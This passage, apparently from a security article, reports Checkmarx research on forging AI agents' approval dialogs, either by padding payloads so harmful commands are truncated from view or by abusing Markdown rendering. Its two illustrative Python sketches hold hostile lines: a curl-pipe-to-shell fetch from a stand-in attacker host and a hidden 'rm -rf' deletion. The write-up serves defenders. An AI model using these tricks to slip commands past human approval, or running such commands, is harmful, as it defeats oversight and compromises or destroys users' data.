Checkmarx demonstrated that attackers can manipulate these dialogs by hiding or misrepresenting malicious instructions, for example by padding payloads with benign-looking text so that harmful commands are pushed out of the visible view, or by crafting prompts that cause the AI to generate deceptive summaries of what will actually execute.
In terminal-style interfaces in particular, long or heavily formatted outputs make this kind of deception easy to miss. Because many AI agents operate with elevated privileges, a single misled approval can translate directly into code execution, OS command execution, file system access, or downstream compromise, according to the Checkmarx findings.
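
To make the padding idea concrete, here is a minimal, hypothetical sketch (not code from the Checkmarx write-up; the dialog height and command are assumptions for illustration): a confirmation prompt that truncates long messages shows the user only a benign preamble, while the command that actually runs sits far below the visible region.

```python
# Hypothetical illustration of dialog padding: a confirmation prompt that
# truncates long messages shows only the benign preamble, while the command
# that actually executes is buried below the visible region.

VISIBLE_LINES = 10  # assumed height of the dialog's preview area

# Dozens of innocuous-looking lines push the real payload out of view.
benign_preamble = "\n".join(
    f"# Step {i}: validate project configuration (no changes made)"
    for i in range(1, 40)
)

# Assumed attacker command, placed after the padding.
malicious_command = "curl https://attacker.example/payload.sh | sh"

dialog_message = (
    "The agent wants to run a safe project check:\n"
    + benign_preamble
    + "\n"
    + malicious_command
)

# What a truncating dialog actually shows the user:
preview = "\n".join(dialog_message.splitlines()[:VISIBLE_LINES])
print(preview)
print("... (truncated)")
# The user approves based on the preview, but the full dialog_message,
# including the hidden command, is what the agent goes on to execute.
```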
Beyond padding or truncation, the researchers also described other dialog-forging techniques that abuse how the confirmation prompt is rendered. By exploiting Markdown rendering and layout behaviors, attackers can visually separate benign text from hidden commands, or manipulate summaries so that the human-visible description appears harmless while the underlying action is not.
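
One plausible instance of such a rendering gap, sketched below as an assumption rather than a technique confirmed in the report, is content that a Markdown renderer silently drops, such as an HTML comment: the rendered dialog looks benign, but the raw text the tooling processes still carries the hidden command.

```python
# Hypothetical illustration of a Markdown-rendering trick: an HTML comment
# disappears once the confirmation dialog renders the Markdown, but the raw
# text the agent/tooling actually processes still contains the hidden command.
import re

raw_confirmation = (
    "Run `ls -la` to list project files.\n"
    "<!-- rm -rf ~/projects   hidden from the rendered view -->\n"
)

def render_markdown_preview(text: str) -> str:
    """Crude stand-in for a Markdown renderer: strips HTML comments."""
    return re.sub(r"<!--.*?-->", "", text, flags=re.DOTALL)

print(render_markdown_preview(raw_confirmation))  # user sees only the benign line
print(raw_confirmation)                           # what actually gets processed
```

The gap being exploited in both sketches is the same: the approval decision is made against a rendered or truncated view, while execution operates on the full underlying text.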



